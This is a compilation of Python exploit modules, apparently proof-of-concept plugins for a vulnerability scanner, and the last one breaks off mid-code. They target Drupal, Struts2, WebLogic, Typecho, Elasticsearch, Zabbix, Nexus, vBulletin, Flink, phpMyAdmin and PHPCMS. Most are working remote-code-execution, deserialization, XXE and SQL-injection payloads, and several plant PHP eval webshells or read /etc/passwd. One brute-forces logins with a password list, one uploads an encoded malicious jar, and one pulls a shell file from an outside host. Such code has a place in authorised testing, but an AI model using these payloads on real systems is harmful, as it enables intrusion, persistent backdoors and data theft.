Exemple #1
0
    def _attack(self):
        result = {}
        vul_url = '%s/user/register?element_parents=account/mail/%%23value&ajax_form=1&_wrapper_format=drupal_ajax' % self.url
        cmd = "echo ':=nfn ct_j($]NMQRYa[)9' | tr '.-x' '0-z'|tee 1.php"
        payload = {
            "form_id": "user_register_form",
            "_drupal_ajax": "1",
            "mail[#post_render][]": "exec",
            "mail[#type]": "markup",
            "mail[#markup]": cmd
        }

        # if not self._verify(verify=False):
        # 	return self.parse_attack(result)

        # print urllib.urlencode(payload)
        response = req.post(vul_url, data=payload, proxies=proxies)
        # response = req.post(vul_url, data=payload)
        # print response.content
        if response.status_code == 200:
            res = req.post(url=self.url + "/1.php",
                           data={"c": "system(\"id\");"},
                           proxies=proxies)
            if "uid" in res.content:
                # print res.content
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = self.url + "/1.php"
                result['ShellInfo']['content'] = '<?php eval($_POST[c]);'

        return self.parse_attack(result)
Exemple #2
0
    def _verify(self):
        result = {}
        vulurl = urlparse.urljoin(
            self.url,
            'index.php?do=ajax&view=upload&file_type=big&filename=filename')
        shell = "Ra<?php echo pocpocpocpoctesttesttest;unlink(__FILE__);?>"

        # 在本地新建一个文件
        f = open('s.php', 'wb+')
        f.write(shell)
        f.flush()
        f.close()

        #上传文件
        f = open('s.php', 'rb')
        files = [('filename', ('php.php', f, 'jpg'))]
        resp = req.post(vulurl, files=files)

        # 删除本地刚创建的文件
        f.close()
        os.remove('s.php')

        # 匹配上传后的路径,并访问该路径验证是否上传成功,并删除已上传的文件
        match = re.findall(r'"(data\\\/uploads\\\/.*?\.php)"', resp.content)
        if match:
            url = urlparse.urljoin(self.url, '/' + match[0].replace('\\', ''))

            resp = req.post(url)
            if resp.status_code == 200 and 'pocpocpocpoctesttesttest' in resp.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vulurl
        return self.parse_output(result)
Exemple #3
0
 def _verify(self):
     '''verify mode'''
     result = {}
     cmd = "cat /etc/passwd"
     target = self.parse_target(self.target, 9200)
     target_ip = target['address']
     target_port = target['port']
     schema = target['schema']
     headers = {
         'Host': '{}:{}'.format(target_ip, target_port),
         'User-Agent':
         'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
         'Accept': '*/*',
         'Accept-Language': 'en',
         'Connection': 'close',
         'Content-Type': 'application/json',
         'Content-Length': '25',
     }
     # 插入数据
     payload = {"name": "phithon"}
     req.post(url='{}://{}:{}/website/blog/'.format(schema, target_ip,
                                                    target_port),
              headers=headers,
              data=json.dumps(payload))
     # 查询
     headers.update({"Content-Length": '343'})
     payload = {
         "size": 1,
         "query": {
             "filtered": {
                 "query": {
                     "match_all": {}
                 }
             }
         },
         "script_fields": {
             "command": {
                 "script":
                 "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\""
                 + cmd +
                 "\").getInputStream()).useDelimiter(\"\\\\A\").next();"
             }
         }
     }
     resp = req.post(url='{}://{}:{}/_search?pretty'.format(
         schema, target_ip, target_port),
                     headers=headers,
                     data=json.dumps(payload))
     if resp:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = '{}://{}:{}/_search?pretty'.format(
             schema, target_ip, target_port)
         result['VerifyInfo']['Command'] = cmd
         result['VerifyInfo']['Result'] = json.loads(resp.text)
     return self.parse_output(result)
Exemple #4
0
 def _verify(self):
     result = {}
     url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
     username = randomStr(6)
     password = randomStr(6, '1234567890')
     data = {
         "siteid": "1",
         "modelid": "1",
         "username": "******" % (username),
         "password": "******" % (password),
         "email": "*****@*****.**" % (username),
         "info[content]":
         "<img src=http://pocsuite.org/include_files/php_attack.txt?.php#.jpg> ",
         "dosubmit": "1",
         "protocol": "",
     }
     match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
     resp = req.post(url, data=data)
     shell = re.findall(match, resp.text)
     shellinfo = ''.join(shell[0]) + ".php"
     if shell:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = self.url
         shell_resp = req.get(shellinfo)
         if shell_resp.status_code == 200:
             result['VerifyInfo']['webshell'] = shellinfo
     return self.parse_attack(result)
Exemple #5
0
 def exec_command(site, command):
     headers = {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0 Safari/537.36',
         'Content-Type': 'application/json;charset=utf-8',
     }
     jar_hash_name = check_jar_exsits(site, upload_jar_name)
     data = r'{"entryClass":"Execute","parallelism":null,"programArgs":"\"%s\"","savepointPath":null,"allowNonRestoredState":null}' % command
     if jar_hash_name:
         execute_cmd_url = '{}/jars/{}/run?entry-class=Execute&program-args="{}"'.format(
             site, jar_hash_name, command)
     else:
         upload_execute_jar(site, upload_jar_name)
         jar_hash_name = check_jar_exsits(site, upload_jar_name)
         if jar_hash_name:
             execute_cmd_url = '{}/jars/{}/run?entry-class=Execute&program-args="{}"'.format(
                 site, jar_hash_name, command)
         else:
             return False
     try:
         r1 = req.post(execute_cmd_url,
                       headers=headers,
                       data=data,
                       verify=False,
                       timeout=20)
         match = re.findall('\|@\|(.*?)\|@\|', r1.text)
         delete_exists_jar(site, jar_hash_name)
         if match:
             return match[0][:-2] if match[
                 0][:-2] else "[result is blank]"
     except req.exceptions.ReadTimeout as e:
         return "[execute timeout]"
     return False
Exemple #6
0
 def _verify(self, verify=True):
     result = {}
     url_list = [self.url]
     flag_list = ['src=\"navigation.php', 'frameborder=\"0\" id=\"frame_content\"', 'id=\"li_server_type\">',
                  'class=\"disableAjax\" title=']
     if "phpmyadmin" not in self.url.lower():
         url_list.append(self.url + "/phpmyadmin/index.php")
     username_list = ['admin', 'root', 'test']
     password_list = ["", '123456789', 'a123456', '123456', 'a123456789', '1234567890', 'woaini1314', 'qwerasdf',
                      'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm', '987654321', 'qwer!@#$',
                      'abc123', '123456789.', '5201314520', 'q123456', '123456abc', '123123123', '123456.',
                      '0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX', '1qaz2wsx']
     for url in url_list:
         try:
             f_res = req.get(url, timeout=5)
             if "pma_password" in f_res.content and 'phpMyAdmin' in f_res.content:
                 for username in username_list:
                     for password in password_list:
                             payload = {'pma_username': username, 'pma_password': password}
                             headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
                             res = req.post(url, headers=headers, data=payload, timeout=5)
                             for flag in flag_list:
                                 if flag in res.content and res.status_code == 200:
                                     result['VerifyInfo'] = {}
                                     result['VerifyInfo']['url'] = url
                                     result['VerifyInfo']['status_code'] = res.status_code
                                     result['VerifyInfo']['username'] = username
                                     result['VerifyInfo']['password'] = password
                                     result['username'] = username
                                     result['password'] = password
                                     return self.parse_attack(result)
         except Exception as e:
             raise e
Exemple #7
0
    def login(self):
        if self.params:
            user_info = eval(self.params)
            uname = user_info['username']
            passwd = user_info['password']
        else:
            uname = 'Admin'
            passwd = 'zabbix'

        payload = {
            "jsonrpc": "2.0",
            "method": "user.login",
            "params": {
                'user': uname,
                'password': passwd,
            },
            "auth": None,
            "id": 0,
        }
        headers = {
            'content-type': 'application/json',
        }
        try:
            auth = req.post("%s/api_jsonrpc.php" % self.url,
                            data=json.dumps(payload),
                            headers=(headers))
            self.auth = auth.json()
            return True
        except:
            return False
Exemple #8
0
    def _verify(self):
        result = {}
        command = "echo 89aifh76ftq4fu38yfq498yf"
        payload = "Content-Type:%{(#_='multipart/form-data')."
        payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
        payload += "(#_memberAccess?"
        payload += "(#_memberAccess=#dm):"
        payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        payload += "(#ognlUtil.getExcludedPackageNames().clear())."
        payload += "(#ognlUtil.getExcludedClasses().clear())."
        payload += "(#context.setMemberAccess(#dm))))."
        payload += "(#cmd='%s')." % command
        payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
        payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
        payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        payload += "(#ros.flush())}"
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}

        response = req.post(self.url, headers=headers)
        if "89aifh76ftq4fu38yfq498yf" in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
        return self.parse_output(result)
Exemple #9
0
 def weblogic_rce(target):
     url = '{}/wls-wsat/CoordinatorPortType'.format(target)
     # content-type必须为text/xml
     payload_header = {
         'content-type':
         'text/xml',
         'User-Agent':
         'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'
     }
     try:
         r = req.post(url,
                      payload_command(),
                      headers=payload_header,
                      verify=False)
         # 500时说明已成功反序列化执行命令
         if r.status_code == 500:
             return verify_result(target)
         elif r.status_code == 404:
             return (False, '404 no vulnerability')
         else:
             return (False,
                     '{} something went wrong'.format(r.status_code))
     except req.exceptions.ReadTimeout:
         return (False, 'timeout')
     except Exception, ex:
         # raise
         return (False, str(ex))
Exemple #10
0
 def strust2_033(self,url): 
     from urlparse import urljoin
     result = {}
     # S2-033 POC
     # Author: CF_HB
     # 时间:2016年6月6日
     # 漏洞编号:CVE-2016-3087 (S2-033)
     # 漏洞详情:http://blog.nsfocus.net/apache-struts2-vulnerability-technical-analysis-protection-scheme-s2-033/
     s2033_poc = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=echo vulnerable"
     try:
         poc_url = urljoin(url,s2033_poc)
         #print poc_url
         s = req.session()
         res = s.post(poc_url, timeout=4, allow_redirects=False, verify=False)
         print '033poc###################################'
         print res.content
         if res.status_code == 200 and "vulnerable" in res.content:
             #print "{url} is vulnerable S2-033.".format(url=url)
                 exp = "%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami"
                 target = urljoin(url, exp) 
                 res = req.post(target, timeout=3, allow_redirects=False, verify=False)
                 restext = res.text.encode('utf-8').strip().strip('\x00')
                 print '033exp###########################'
                 print restext
                 if 'command=whoami' not in restext:
                     result['VerifyInfo'] = {}
                     result['name'] = 'strust2_033'
                     result['VerifyInfo']['URL'] = url
                     result['VerifyInfo']['Payload'] = poc_url
         else:
             #print "{url} is not vulnerable..".format(url=url)
             pass
     except Exception, e:
         print e
Exemple #11
0
 def _attack(self):
     #定义返回结果
     result = {}
     header = {
             "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
             "Accept-Encoding": "gzip, deflate",
             "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
             "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
             "Referer": self.url
     }
     payload = "YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCd3ZWJzaGVsbC5waHAnLCAnPD9waHAgQGV2YWwoJF9QT1NUW3AwXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6NzoidHlwZWNobyI7fQ=="
     data = {
         "__typecho_config":payload
     }
     #获取漏洞url
     vul_url = '%s' % self.url
     #获取处理后的url
     vul_url = self.url+"/install.php?finish=a"
     res = req.post(vul_url,headers=header,data=data)
     status = req.get(self.url+"/webshell.php").status_code
     if status == 200:
         result['VerifyInfo']={}
         result['VerifyInfo']['URL']=self.url+"/webshell.php"+"--->Password:P0"
         result['VerifyInfo']['Payload']=data
         return self.save_output(result)
Exemple #12
0
    def login(self):
        if self.params:
            user_info = eval(self.params)
            uname = user_info['username']
            passwd = user_info['password']
        else:
            uname = 'Admin'
            passwd = 'zabbix'

        payload = {
            "jsonrpc" : "2.0",
            "method" : "user.login",
            "params": {
                'user': uname,
                'password': passwd,
            },
            "auth" : None,
            "id" : 0,
        }
        headers = {
            'content-type': 'application/json',
        }
        try:
            auth  = req.post("%s/api_jsonrpc.php" % self.url, data=json.dumps(payload), headers=(headers))
            self.auth = auth.json()
            return True
        except:
            return False
Exemple #13
0
def upload_webshell(host, uri):
    set_new_upload_path(host, get_new_work_path(host))
    upload_content = "POC test"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest',
    }
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": "test",
        "ks_password_changed": "true",
        "ks_filename": ("test.jsp", upload_content)
    }

    resp = req.post(host + uri, files=files)
    response = resp.text
    match = re.findall("<id>(.*?)</id>", response)
    if match:
        tid = match[-1]
        shell_path = host + "/ws_utc/css/config/keystore/" + str(
            tid) + "_test.jsp"
        if upload_content in req.get(shell_path, headers=headers).content:
            print shell_path
            return True
        else:
            return False
    else:
        return False
Exemple #14
0
 def _netreq(self, target_url, username, password):
     result = {}
     flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">',
                  'class="disableAjax" title=']
     
     for _ in range(10):
         res = req.get(url = target_url)
         set_session = re.findall(r"name=\"set_session\" value=\"(.*?)\" \/", res.text)[0]
         token = re.findall(r"name=\"token\" value=\"(.*?)\" \/", res.text)[0]
         cookie = ''
         for x,y in res.cookies.get_dict().items():
             cookie = cookie + "{}={};".format(x,y)
         header = {
             "Content-Type":"application/x-www-form-urlencoded",
             "Cookie": cookie
         }
         payload = {
             "set_session": set_session,
             "pma_username": username,
             "pma_password": password,
             "server": "1",
             "target": "index.php",
             "token": token
         }
         payload = urllib.urlencode(payload)
         response = req.post(url = target_url, data=payload, headers=header)
         for flag in flag_list:
             if flag in response.content:
                 result['VerifyInfo'] = {}
                 result['VerifyInfo']['URL'] = target_url
                 result['VerifyInfo']['Payload'] = payload
                 return result
     return result
Exemple #15
0
    def _verify(self):
        result = {}
        if self.login():
            cmd = 'whoami'
            hostid = '10084'

            payload = {
                "jsonrpc": "2.0",
                "method": "script.update",
                "params": {
                    "scriptid": "1",
                    "command": "" + cmd + ""
                },
                "auth": self.auth['result'],
                "id": 0,
            }

            headers = {
                'content-type': 'application/json',
            }

            cmd_upd = req.post("%s/api_jsonrpc.php" % self.url,
                               data=json.dumps(payload),
                               headers=headers)

            payload = {
                "jsonrpc": "2.0",
                "method": "script.execute",
                "params": {
                    "scriptid": "1",
                    "hostid": hostid
                },
                "auth": self.auth['result'],
                "id": 0,
            }

            cmd_exe = req.post("%s/api_jsonrpc.php" % self.url,
                               data=json.dumps(payload),
                               headers=headers)
            cmd_exe = cmd_exe.json()
            if cmd_exe["result"]["response"] == 'success':
                result['VerifyInfo'] = {}
                result['VerifyInfo']['Url'] = self.url
                result['VerifyInfo']['Cmd'] = cmd
                result['VerifyInfo']['Value'] = cmd_exe['result']['value']

        return self.parse_output(result)
Exemple #16
0
    def _verify(self):
        '''verify mode'''
        result = {}

        data = '''<?xml version="1.0" encoding="utf-8"?>
              <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                  <soapenv:Header>
                      <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                          <java>
                              <void class="weblogic.utils.Hex" method="fromHexString" id="cls"><string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
                              </void>
                              <void class="org.mozilla.classfile.DefiningClassLoader">
                                  <void method="defineClass">
                                      <string>com.supeream.exploits.XmlExp</string>
                                      <object idref="cls"></object>
                                      <void method="newInstance">
                                          <void method="say" id="proc">
                                              <string>whoami</string>
                                          </void>
                                      </void>
                                  </void>
                              </void>
                              <void class="java.lang.Thread" method="currentThread">
                                  <void method="getCurrentWork">
                                      <void method="getResponse">
                                          <void method="getServletOutputStream">
                                              <void method="writeStream">
                                                  <object idref="proc"></object>
                                              </void>
                                              <void method="flush"/>
                                          </void>
                                          <void method="getWriter"><void method="write"><string></string></void></void>
                                      </void>
                                  </void>
                              </void>
                          </java>
                      </work:WorkContext>
                  </soapenv:Header>
                  <soapenv:Body/>
              </soapenv:Envelope>'''

        headers = {
            'User-Agent':
            'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'text/xml',
            'Content-Length': '{}'.format(len(data))
        }

        resp = req.post(urljoin(self.url, '/wls-wsat/CoordinatorPortType'),
                        headers=headers,
                        data=data)

        if resp.status_code == 200 and resp.content and len(resp.content) < 20:
            result['VerifyInfo'] = "success"
            result['Username'] = resp.content.strip()
        return self.parse_output(result)
Exemple #17
0
 def _verify(self):
     result = {}
     target = urljoin(self.url, "/simplexml_load_string.php")
     http_body = '''<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root><name>&xxe;</name></root>'''
     resp = req.post(target, data=http_body)
     if "x:0:0:root" in resp.text:
         result['VerifyInfo'] = "success"
     return self.parse_output(result)
Exemple #18
0
 def upload_execute_jar(site, upload_jar_name):
     upload_jar_url = "{}/jars/upload".format(site)
     file_content = base64.b64decode(
         'UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALgAAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAAAAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAKVkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLvCGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujCQNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJNaFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Qo0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNMKA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjoRF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqps0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJcVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEsOJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6EjptI4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IOYg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1bU+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSwECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQAFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUGAAAAAAMAAwC4AAAArgQAAAAA'
     )
     files = {
         'jarfile': (upload_jar_name, cStringIO.StringIO(file_content),
                     'application/octet-stream')
     }
     try:
         req.post(upload_jar_url,
                  headers=default_headers,
                  files=files,
                  timeout=30,
                  verify=False)
     except Exception as e:
         return False
     return True
Exemple #19
0
    def _verify(self):
        result = {}
        if self.login():
            cmd = 'whoami'
            hostid = '10084'

            payload = {
                "jsonrpc": "2.0",
                "method": "script.update",
                "params": {
                    "scriptid": "1",
                    "command": ""+cmd+""
                },
                "auth" : self.auth['result'],
                "id" : 0,
            }

            headers = {
                'content-type': 'application/json',
            }
         
            cmd_upd = req.post("%s/api_jsonrpc.php" % self.url, data = json.dumps(payload), headers = headers)

            payload = {
                "jsonrpc": "2.0",
                "method": "script.execute",
                "params": {
                    "scriptid": "1",
                    "hostid": hostid
                },
                "auth" : self.auth['result'],
                "id" : 0,
            }

            cmd_exe = req.post("%s/api_jsonrpc.php" % self.url, data = json.dumps(payload), headers = headers)
            cmd_exe = cmd_exe.json()
            if cmd_exe["result"]["response"] == 'success':
                result['VerifyInfo'] = {}
                result['VerifyInfo']['Url'] = self.url
                result['VerifyInfo']['Cmd'] = cmd
                result['VerifyInfo']['Value'] = cmd_exe['result']['value']

        return self.parse_output(result)
Exemple #20
0
    def _verify(self):
        # 调用指纹方法
        result = {}

        vul_url = self.url

        target_url = vul_url + "/service/extdirect"

        headers = {'Referer': ''}
        import json
        j = {
            "action":
            "coreui_Component",
            "method":
            "previewAssets",
            "data": [{
                "page":
                1,
                "start":
                0,
                "limit":
                25,
                "filter": [{
                    "property": "repositoryName",
                    "value": "*"
                }, {
                    "property":
                    "expression",
                    "value":
                    "1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()"
                    .format(self.BANNER, self.DOMAIN)
                }, {
                    "property": "type",
                    "value": "jexl"
                }]
            }],
            "type":
            "rpc",
            "tid":
            4
        }

        try:
            resp = req.post(target_url, json=j, headers=headers, timeout=1)
        except Exception as e:
            print e

        import time
        time.sleep(2)  # 休眠2s等待ceye生成记录
        if self.dnslog_sucess(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)
Exemple #21
0
 def _verify(self):
     result = {}
     target = self.url
     params = {"routestring":"ajax/render/widget_php"}
     random_int1 = random.randint(0,200000)
     random_int2 = random.randint(0,200000)
     params["widgetConfig[code]"] = "echo shell_exec('expr {} + {}'); exit;".format(random_int1,random_int2)
     r = req.post(target, data = params)
     if r.status_code == 200 and str(random_int1+random_int2) in r.text :
         result['result'] = {}
         result['result']['text'] = r.text
     return self.parse_attack(result)
Exemple #22
0
    def _verify(self):
        result = {}
        vulurl = "%s/?m=hotel.getHotelInfo" % self.url
        payload = {"hotelId":"11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(MD5(3.14) AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"}
        resp = req.post(vulurl,data = payload,timeout =15)
        re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
        if re_result:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_output(result)
Exemple #23
0
    def _verify(self):
        '''verify mode'''
        result = {}
        if urlparse(self.url).port is None:
            self.url = self.url + ":8500"
        url = urljoin(
            self.url,
            '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm')
        filename = randomStr(6)
        content = randomStr(12)

        data = "-----------------------------24464570528145\r\n"
        data += "Content-Disposition: form-data; name=\"file\"; filename=\"{filename}\"\r\n".format(
            filename=filename)
        data += "Content-Type: image/jpeg\r\n"
        data += "\r\n"
        data += "{content}\r\n".format(content=content)
        data += "-----------------------------24464570528145\r\n"
        data += "Content-Disposition: form-data; name=\"path\"\r\n"
        data += "\r\n"
        data += "we\r\n"
